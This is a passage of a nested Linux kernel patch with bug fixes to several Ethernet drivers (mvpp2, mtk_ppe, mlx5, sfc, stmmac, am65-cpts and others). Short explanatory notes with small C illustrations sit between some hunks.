+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_TCP4, MVPP2_FL_IP4_TCP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_TCP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_TCP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* UDP over IPv4 flows, Not fragmented, no vlan tag */
+@@ -132,35 +135,38 @@ static const struct mvpp2_cls_flow cls_flows[MVPP2_N_PRS_FLOWS] = {
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4 |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OPT |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_UNTAG,
+ 		       MVPP22_CLS_HEK_IP4_2T,
+ 		       MVPP2_PRS_RI_VLAN_NONE | MVPP2_PRS_RI_L3_IP4_OTHER |
+-		       MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_IP_FRAG_TRUE | MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK | MVPP2_PRS_RI_VLAN_MASK),
+ 
+ 	/* UDP over IPv4 flows, fragmented, with vlan tag */
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4 | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OPT | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	MVPP2_DEF_FLOW(MVPP22_FLOW_UDP4, MVPP2_FL_IP4_UDP_FRAG_TAG,
+ 		       MVPP22_CLS_HEK_IP4_2T | MVPP22_CLS_HEK_TAGGED,
+-		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_L4_UDP,
++		       MVPP2_PRS_RI_L3_IP4_OTHER | MVPP2_PRS_RI_IP_FRAG_TRUE |
++			   MVPP2_PRS_RI_L4_UDP,
+ 		       MVPP2_PRS_IP_MASK),
+ 
+ 	/* TCP over IPv6 flows, not fragmented, no vlan tag */
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+index 75ba57bd1d46d..9af22f497a40f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_prs.c
+@@ -1539,8 +1539,8 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ 	if (!priv->prs_double_vlans)
+ 		return -ENOMEM;
+ 
+-	/* Double VLAN: 0x8100, 0x88A8 */
+-	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021Q, ETH_P_8021AD,
++	/* Double VLAN: 0x88A8, 0x8100 */
++	err = mvpp2_prs_double_vlan_add(priv, ETH_P_8021AD, ETH_P_8021Q,
+ 					MVPP2_PRS_PORT_MASK);
+ 	if (err)
+ 		return err;
+@@ -1607,59 +1607,45 @@ static int mvpp2_prs_vlan_init(struct platform_device *pdev, struct mvpp2 *priv)
+ static int mvpp2_prs_pppoe_init(struct mvpp2 *priv)
+ {
+ 	struct mvpp2_prs_entry pe;
+-	int tid;
+-
+-	/* IPv4 over PPPoE with options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
+-
+-	memset(&pe, 0, sizeof(pe));
+-	mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
+-	pe.index = tid;
+-
+-	mvpp2_prs_match_etype(&pe, 0, PPP_IP);
+-
+-	mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4_OPT,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
+-	/* goto ipv4 dest-address (skip eth_type + IP-header-size - 4) */
+-	mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
+-				 sizeof(struct iphdr) - 4,
+-				 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
+-	/* Set L3 offset */
+-	mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
+-				  MVPP2_ETH_TYPE_LEN,
+-				  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+-
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++	int tid, ihl;
+ 
+-	/* IPv4 over PPPoE without options */
+-	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
+-					MVPP2_PE_LAST_FREE_TID);
+-	if (tid < 0)
+-		return tid;
++	/* IPv4 over PPPoE with header length >= 5 */
++	for (ihl = MVPP2_PRS_IPV4_IHL_MIN; ihl <= MVPP2_PRS_IPV4_IHL_MAX; ihl++) {
++		tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
++						MVPP2_PE_LAST_FREE_TID);
++		if (tid < 0)
++			return tid;
+ 
+-	pe.index = tid;
++		memset(&pe, 0, sizeof(pe));
++		mvpp2_prs_tcam_lu_set(&pe, MVPP2_PRS_LU_PPPOE);
++		pe.index = tid;
+ 
+-	mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
+-				     MVPP2_PRS_IPV4_HEAD |
+-				     MVPP2_PRS_IPV4_IHL_MIN,
+-				     MVPP2_PRS_IPV4_HEAD_MASK |
+-				     MVPP2_PRS_IPV4_IHL_MASK);
++		mvpp2_prs_match_etype(&pe, 0, PPP_IP);
++		mvpp2_prs_tcam_data_byte_set(&pe, MVPP2_ETH_TYPE_LEN,
++					     MVPP2_PRS_IPV4_HEAD | ihl,
++					     MVPP2_PRS_IPV4_HEAD_MASK |
++					     MVPP2_PRS_IPV4_IHL_MASK);
+ 
+-	/* Clear ri before updating */
+-	pe.sram[MVPP2_PRS_SRAM_RI_WORD] = 0x0;
+-	pe.sram[MVPP2_PRS_SRAM_RI_CTRL_WORD] = 0x0;
+-	mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
+-				 MVPP2_PRS_RI_L3_PROTO_MASK);
++		mvpp2_prs_sram_next_lu_set(&pe, MVPP2_PRS_LU_IP4);
++		mvpp2_prs_sram_ri_update(&pe, MVPP2_PRS_RI_L3_IP4,
++					 MVPP2_PRS_RI_L3_PROTO_MASK);
++		/* goto ipv4 dst-address (skip eth_type + IP-header-size - 4) */
++		mvpp2_prs_sram_shift_set(&pe, MVPP2_ETH_TYPE_LEN +
++					 sizeof(struct iphdr) - 4,
++					 MVPP2_PRS_SRAM_OP_SEL_SHIFT_ADD);
++		/* Set L3 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L3,
++					  MVPP2_ETH_TYPE_LEN,
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
++		/* Set L4 offset */
++		mvpp2_prs_sram_offset_set(&pe, MVPP2_PRS_SRAM_UDF_TYPE_L4,
++					  MVPP2_ETH_TYPE_LEN + (ihl * 4),
++					  MVPP2_PRS_SRAM_OP_SEL_UDF_ADD);
+ 
+-	/* Update shadow table and hw entry */
+-	mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
+-	mvpp2_prs_hw_write(priv, &pe);
++		/* Update shadow table and hw entry */
++		mvpp2_prs_shadow_set(priv, pe.index, MVPP2_PRS_LU_PPPOE);
++		mvpp2_prs_hw_write(priv, &pe);
++	}
+ 
+ 	/* IPv6 over PPPoE */
+ 	tid = mvpp2_prs_tcam_first_free(priv, MVPP2_PE_FIRST_FREE_TID,
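
The rewritten PPPoE block above installs one parser entry per legal IPv4 header length and, unlike the old code, also programs an L4 offset derived from it. The offsets are simple arithmetic over the 2-byte PPP protocol field (MVPP2_ETH_TYPE_LEN) and the IHL in 32-bit words; a small sketch, assuming the driver's IHL range of 5..15:

#include <stdio.h>

#define PPP_PROTO_LEN	2	/* mirrors MVPP2_ETH_TYPE_LEN here */

int main(void)
{
	int ihl;

	for (ihl = 5; ihl <= 15; ihl++)	/* legal IPv4 IHL values */
		printf("ihl=%2d  l3_off=%d  l4_off=%d\n",
		       ihl, PPP_PROTO_LEN, PPP_PROTO_LEN + ihl * 4);

	return 0;
}
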
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index 34ea8af48c3d0..d6eed204574a9 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -438,6 +438,7 @@ __mtk_foe_entry_clear(struct mtk_ppe *ppe, struct mtk_flow_entry *entry)
+ 		hwe->ib1 &= ~MTK_FOE_IB1_STATE;
+ 		hwe->ib1 |= FIELD_PREP(MTK_FOE_IB1_STATE, MTK_FOE_STATE_INVALID);
+ 		dma_wmb();
++		mtk_ppe_cache_clear(ppe);
+ 	}
+ 	entry->hash = 0xffff;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+index 28bbd1df3e305..6a72687d5b83f 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe_offload.c
+@@ -570,6 +570,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (IS_ERR(block_cb))
+ 			return PTR_ERR(block_cb);
+ 
++		flow_block_cb_incref(block_cb);
+ 		flow_block_cb_add(block_cb, f);
+ 		list_add_tail(&block_cb->driver_list, &block_cb_list);
+ 		return 0;
+@@ -578,7 +579,7 @@ mtk_eth_setup_tc_block(struct net_device *dev, struct flow_block_offload *f)
+ 		if (!block_cb)
+ 			return -ENOENT;
+ 
+-		if (flow_block_cb_decref(block_cb)) {
++		if (!flow_block_cb_decref(block_cb)) {
+ 			flow_block_cb_remove(block_cb, f);
+ 			list_del(&block_cb->driver_list);
+ 		}
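
The one-character mtk_ppe fix above hinges on flow_block_cb_decref() returning the refcount after the decrement: teardown belongs on a zero return, so the old non-zero test tore the callback down while other binders still held it. A toy counter makes the off-by-one visible:

#include <stdio.h>

static int refcnt;

static int decref(void)
{
	return --refcnt;	/* like flow_block_cb_decref(): post-decrement value */
}

int main(void)
{
	refcnt = 2;	/* two users bound to the same flow block */

	/* buggy test:  if (decref())  -> frees while refcnt is still 1 */
	/* fixed test:  if (!decref()) -> frees only when refcnt hits 0 */
	while (refcnt > 0)
		if (!decref())
			printf("teardown at refcnt 0 (correct)\n");

	return 0;
}
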
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 3b5c5064cfafc..5e01de4c32037 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4104,13 +4104,17 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 		struct xsk_buff_pool *xsk_pool =
+ 			mlx5e_xsk_get_pool(&chs->params, chs->params.xsk, ix);
+ 		struct mlx5e_xsk_param xsk;
++		int max_xdp_mtu;
+ 
+ 		if (!xsk_pool)
+ 			continue;
+ 
+ 		mlx5e_build_xsk_param(xsk_pool, &xsk);
++		max_xdp_mtu = mlx5e_xdp_max_mtu(new_params, &xsk);
+ 
+-		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev)) {
++		/* Validate XSK params and XDP MTU in advance */
++		if (!mlx5e_validate_xsk_param(new_params, &xsk, mdev) ||
++		    new_params->sw_mtu > max_xdp_mtu) {
+ 			u32 hr = mlx5e_get_linear_rq_headroom(new_params, &xsk);
+ 			int max_mtu_frame, max_mtu_page, max_mtu;
+ 
+@@ -4120,9 +4124,9 @@ static bool mlx5e_xsk_validate_mtu(struct net_device *netdev,
+ 			 */
+ 			max_mtu_frame = MLX5E_HW2SW_MTU(new_params, xsk.chunk_size - hr);
+ 			max_mtu_page = MLX5E_HW2SW_MTU(new_params, SKB_MAX_HEAD(0));
+-			max_mtu = min(max_mtu_frame, max_mtu_page);
++			max_mtu = min3(max_mtu_frame, max_mtu_page, max_xdp_mtu);
+ 
+-			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u. Try MTU <= %d\n",
++			netdev_err(netdev, "MTU %d is too big for an XSK running on channel %u or its redirection XDP program. Try MTU <= %d\n",
+ 				   new_params->sw_mtu, ix, max_mtu);
+ 			return false;
+ 		}
+diff --git a/drivers/net/ethernet/mscc/ocelot_stats.c b/drivers/net/ethernet/mscc/ocelot_stats.c
+index dbd20b125ceaf..0066219bb0e89 100644
+--- a/drivers/net/ethernet/mscc/ocelot_stats.c
++++ b/drivers/net/ethernet/mscc/ocelot_stats.c
+@@ -392,7 +392,8 @@ static int ocelot_prepare_stats_regions(struct ocelot *ocelot)
+ 		if (!ocelot->stats_layout[i].reg)
+ 			continue;
+ 
+-		if (region && ocelot->stats_layout[i].reg == last + 4) {
++		if (region && ocelot->map[SYS][ocelot->stats_layout[i].reg & REG_MASK] ==
++		    ocelot->map[SYS][last & REG_MASK] + 4) {
+ 			region->count++;
+ 		} else {
+ 			region = devm_kzalloc(ocelot->dev, sizeof(*region),
+diff --git a/drivers/net/ethernet/realtek/r8169_phy_config.c b/drivers/net/ethernet/realtek/r8169_phy_config.c
+index 930496cd34ed0..b50f16786c246 100644
+--- a/drivers/net/ethernet/realtek/r8169_phy_config.c
++++ b/drivers/net/ethernet/realtek/r8169_phy_config.c
+@@ -826,6 +826,9 @@ static void rtl8168h_2_hw_phy_config(struct rtl8169_private *tp,
+ 	/* disable phy pfm mode */
+ 	phy_modify_paged(phydev, 0x0a44, 0x11, BIT(7), 0);
+ 
++	/* disable 10m pll off */
++	phy_modify_paged(phydev, 0x0a43, 0x10, BIT(0), 0);
++
+ 	rtl8168g_disable_aldps(phydev);
+ 	rtl8168g_config_eee_phy(phydev);
+ }
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index 7022fb2005a2f..d30459dbfe8f8 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -1304,7 +1304,8 @@ static void efx_ef10_fini_nic(struct efx_nic *efx)
+ static int efx_ef10_init_nic(struct efx_nic *efx)
+ {
+ 	struct efx_ef10_nic_data *nic_data = efx->nic_data;
+-	netdev_features_t hw_enc_features = 0;
++	struct net_device *net_dev = efx->net_dev;
++	netdev_features_t tun_feats, tso_feats;
+ 	int rc;
+ 
+ 	if (nic_data->must_check_datapath_caps) {
+@@ -1349,20 +1350,30 @@ static int efx_ef10_init_nic(struct efx_nic *efx)
+ 		nic_data->must_restore_piobufs = false;
+ 	}
+ 
+-	/* add encapsulated checksum offload features */
++	/* encap features might change during reset if fw variant changed */
+ 	if (efx_has_cap(efx, VXLAN_NVGRE) && !efx_ef10_is_vf(efx))
+-		hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
+-	/* add encapsulated TSO features */
+-	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
+-		netdev_features_t encap_tso_features;
++		net_dev->hw_enc_features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
++	else
++		net_dev->hw_enc_features &= ~(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM);
+ 
+-		encap_tso_features = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
+-			NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tun_feats = NETIF_F_GSO_UDP_TUNNEL | NETIF_F_GSO_GRE |
++		    NETIF_F_GSO_UDP_TUNNEL_CSUM | NETIF_F_GSO_GRE_CSUM;
++	tso_feats = NETIF_F_TSO | NETIF_F_TSO6;
+ 
+-		hw_enc_features |= encap_tso_features | NETIF_F_TSO;
+-		efx->net_dev->features |= encap_tso_features;
++	if (efx_has_cap(efx, TX_TSO_V2_ENCAP)) {
++		/* If this is the first nic_init, or if it is a reset and a new fw
++		 * variant has added new features, enable them by default.
++		 * If the features are not new, maintain their current value.
++		 */
++		if (!(net_dev->hw_features & tun_feats))
++			net_dev->features |= tun_feats;
++		net_dev->hw_enc_features |= tun_feats | tso_feats;
++		net_dev->hw_features |= tun_feats;
++	} else {
++		net_dev->hw_enc_features &= ~(tun_feats | tso_feats);
++		net_dev->hw_features &= ~tun_feats;
++		net_dev->features &= ~tun_feats;
+ 	}
+-	efx->net_dev->hw_enc_features = hw_enc_features;
+ 
+ 	/* don't fail init if RSS setup doesn't work */
+ 	rc = efx->type->rx_push_rss_config(efx, false,
+@@ -4021,7 +4032,10 @@ static unsigned int efx_ef10_recycle_ring_size(const struct efx_nic *efx)
+ 	 NETIF_F_HW_VLAN_CTAG_FILTER |	\
+ 	 NETIF_F_IPV6_CSUM |		\
+ 	 NETIF_F_RXHASH |		\
+-	 NETIF_F_NTUPLE)
++	 NETIF_F_NTUPLE |		\
++	 NETIF_F_SG |			\
++	 NETIF_F_RXCSUM |		\
++	 NETIF_F_RXALL)
+ 
+ const struct efx_nic_type efx_hunt_a0_vf_nic_type = {
+ 	.is_vf = true,
+diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c
+index 3a86f1213a051..6a1bff54bc6c3 100644
+--- a/drivers/net/ethernet/sfc/efx.c
++++ b/drivers/net/ethernet/sfc/efx.c
+@@ -1001,21 +1001,18 @@ static int efx_pci_probe_post_io(struct efx_nic *efx)
+ 	}
+ 
+ 	/* Determine netdevice features */
+-	net_dev->features |= (efx->type->offload_features | NETIF_F_SG |
+-			      NETIF_F_TSO | NETIF_F_RXCSUM | NETIF_F_RXALL);
+-	if (efx->type->offload_features & (NETIF_F_IPV6_CSUM | NETIF_F_HW_CSUM)) {
+-		net_dev->features |= NETIF_F_TSO6;
+-		if (efx_has_cap(efx, TX_TSO_V2_ENCAP))
+-			net_dev->hw_enc_features |= NETIF_F_TSO6;
+-	}
+-	/* Check whether device supports TSO */
+-	if (!efx->type->tso_versions || !efx->type->tso_versions(efx))
+-		net_dev->features &= ~NETIF_F_ALL_TSO;
++	net_dev->features |= efx->type->offload_features;
++
++	/* Add TSO features */
++	if (efx->type->tso_versions && efx->type->tso_versions(efx))
++		net_dev->features |= NETIF_F_TSO | NETIF_F_TSO6;
++
+ 	/* Mask for features that also apply to VLAN devices */
+ 	net_dev->vlan_features |= (NETIF_F_HW_CSUM | NETIF_F_SG |
+ 				   NETIF_F_HIGHDMA | NETIF_F_ALL_TSO |
+ 				   NETIF_F_RXCSUM);
+ 
++	/* Determine user configurable features */
+ 	net_dev->hw_features |= net_dev->features & ~efx->fixed_features;
+ 
+ 	/* Disable receiving frames with bad FCS, by default. */
+diff --git a/drivers/net/ethernet/smsc/smsc911x.c b/drivers/net/ethernet/smsc/smsc911x.c
+index a2e511912e6a9..a690d139e1770 100644
+--- a/drivers/net/ethernet/smsc/smsc911x.c
++++ b/drivers/net/ethernet/smsc/smsc911x.c
+@@ -1037,8 +1037,6 @@ static int smsc911x_mii_probe(struct net_device *dev)
+ 		return ret;
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	phy_set_max_speed(phydev, SPEED_100);
+@@ -1066,6 +1064,7 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 			     struct net_device *dev)
+ {
+ 	struct smsc911x_data *pdata = netdev_priv(dev);
++	struct phy_device *phydev;
+ 	int err = -ENXIO;
+ 
+ 	pdata->mii_bus = mdiobus_alloc();
+@@ -1108,6 +1107,10 @@ static int smsc911x_mii_init(struct platform_device *pdev,
+ 		goto err_out_free_bus_2;
+ 	}
+ 
++	phydev = phy_find_first(pdata->mii_bus);
++	if (phydev)
++		phydev->mac_managed_pm = true;
++
+ 	return 0;
+ 
+ err_out_free_bus_2:
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index ec9c130276d89..54bb072aeb2d3 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -532,7 +532,6 @@ struct mac_device_info {
+ 	unsigned int xlgmac;
+ 	unsigned int num_vlan;
+ 	u32 vlan_filter[32];
+-	unsigned int promisc;
+ 	bool vlan_fail_q_en;
+ 	u8 vlan_fail_q;
+ };
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index e5cfde1cbd5ce..188a00065f66c 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -481,12 +481,6 @@ static int dwmac4_add_hw_vlan_rx_fltr(struct net_device *dev,
+ 	if (vid > 4095)
+ 		return -EINVAL;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Adding VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		/* For single VLAN filter, VID 0 means VLAN promiscuous */
+@@ -536,12 +530,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ {
+ 	int i, ret = 0;
+ 
+-	if (hw->promisc) {
+-		netdev_err(dev,
+-			   "Deleting VLAN in promisc mode not supported\n");
+-		return -EPERM;
+-	}
+-
+ 	/* Single Rx VLAN Filter */
+ 	if (hw->num_vlan == 1) {
+ 		if ((hw->vlan_filter[0] & GMAC_VLAN_TAG_VID) == vid) {
+@@ -566,39 +554,6 @@ static int dwmac4_del_hw_vlan_rx_fltr(struct net_device *dev,
+ 	return ret;
+ }
+ 
+-static void dwmac4_vlan_promisc_enable(struct net_device *dev,
+-				       struct mac_device_info *hw)
+-{
+-	void __iomem *ioaddr = hw->pcsr;
+-	u32 value;
+-	u32 hash;
+-	u32 val;
+-	int i;
+-
+-	/* Single Rx VLAN Filter */
+-	if (hw->num_vlan == 1) {
+-		dwmac4_write_single_vlan(dev, 0);
+-		return;
+-	}
+-
+-	/* Extended Rx VLAN Filter Enable */
+-	for (i = 0; i < hw->num_vlan; i++) {
+-		if (hw->vlan_filter[i] & GMAC_VLAN_TAG_DATA_VEN) {
+-			val = hw->vlan_filter[i] & ~GMAC_VLAN_TAG_DATA_VEN;
+-			dwmac4_write_vlan_filter(dev, hw, i, val);
+-		}
+-	}
+-
+-	hash = readl(ioaddr + GMAC_VLAN_HASH_TABLE);
+-	if (hash & GMAC_VLAN_VLHT) {
+-		value = readl(ioaddr + GMAC_VLAN_TAG);
+-		if (value & GMAC_VLAN_VTHM) {
+-			value &= ~GMAC_VLAN_VTHM;
+-			writel(value, ioaddr + GMAC_VLAN_TAG);
+-		}
+-	}
+-}
+-
+ static void dwmac4_restore_hw_vlan_rx_fltr(struct net_device *dev,
+ 					   struct mac_device_info *hw)
+ {
+@@ -718,22 +673,12 @@ static void dwmac4_set_filter(struct mac_device_info *hw,
+ 	}
+ 
+ 	/* VLAN filtering */
+-	if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
++	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en)
++		value &= ~GMAC_PACKET_FILTER_VTFE;
++	else if (dev->features & NETIF_F_HW_VLAN_CTAG_FILTER)
+ 		value |= GMAC_PACKET_FILTER_VTFE;
+ 
+ 	writel(value, ioaddr + GMAC_PACKET_FILTER);
+-
+-	if (dev->flags & IFF_PROMISC && !hw->vlan_fail_q_en) {
+-		if (!hw->promisc) {
+-			hw->promisc = 1;
+-			dwmac4_vlan_promisc_enable(dev, hw);
+-		}
+-	} else {
+-		if (hw->promisc) {
+-			hw->promisc = 0;
+-			dwmac4_restore_hw_vlan_rx_fltr(dev, hw);
+-		}
+-	}
+ }
+ 
+ static void dwmac4_flow_ctrl(struct mac_device_info *hw, unsigned int duplex,
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 00911e9360525..8ff1c84a23ce7 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2817,6 +2817,7 @@ static int am65_cpsw_nuss_probe(struct platform_device *pdev)
+ 
+ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ err_of_clear:
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+@@ -2845,6 +2846,7 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	 */
+ 	am65_cpsw_nuss_cleanup_ndev(common);
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ 
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpts.c b/drivers/net/ethernet/ti/am65-cpts.c
+index e2f0fb286143b..9948ac14e68db 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.c
++++ b/drivers/net/ethernet/ti/am65-cpts.c
+@@ -918,14 +918,13 @@ static int am65_cpts_of_parse(struct am65_cpts *cpts, struct device_node *node)
+ 	return cpts_of_mux_clk_setup(cpts, node);
+ }
+ 
+-static void am65_cpts_release(void *data)
++void am65_cpts_release(struct am65_cpts *cpts)
+ {
+-	struct am65_cpts *cpts = data;
+-
+ 	ptp_clock_unregister(cpts->ptp_clock);
+ 	am65_cpts_disable(cpts);
+ 	clk_disable_unprepare(cpts->refclk);
+ }
++EXPORT_SYMBOL_GPL(am65_cpts_release);
+ 
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node)
+@@ -1003,18 +1002,12 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 	}
+ 	cpts->phc_index = ptp_clock_index(cpts->ptp_clock);
+ 
+-	ret = devm_add_action_or_reset(dev, am65_cpts_release, cpts);
+-	if (ret) {
+-		dev_err(dev, "failed to add ptpclk reset action %d", ret);
+-		return ERR_PTR(ret);
+-	}
+-
+ 	ret = devm_request_threaded_irq(dev, cpts->irq, NULL,
+ 					am65_cpts_interrupt,
+ 					IRQF_ONESHOT, dev_name(dev), cpts);
+ 	if (ret < 0) {
+ 		dev_err(cpts->dev, "error attaching irq %d\n", ret);
+-		return ERR_PTR(ret);
++		goto reset_ptpclk;
+ 	}
+ 
+ 	dev_info(dev, "CPTS ver 0x%08x, freq:%u, add_val:%u\n",
+@@ -1023,6 +1016,8 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 
+ 	return cpts;
+ 
++reset_ptpclk:
++	am65_cpts_release(cpts);
+ refclk_disable:
+ 	clk_disable_unprepare(cpts->refclk);
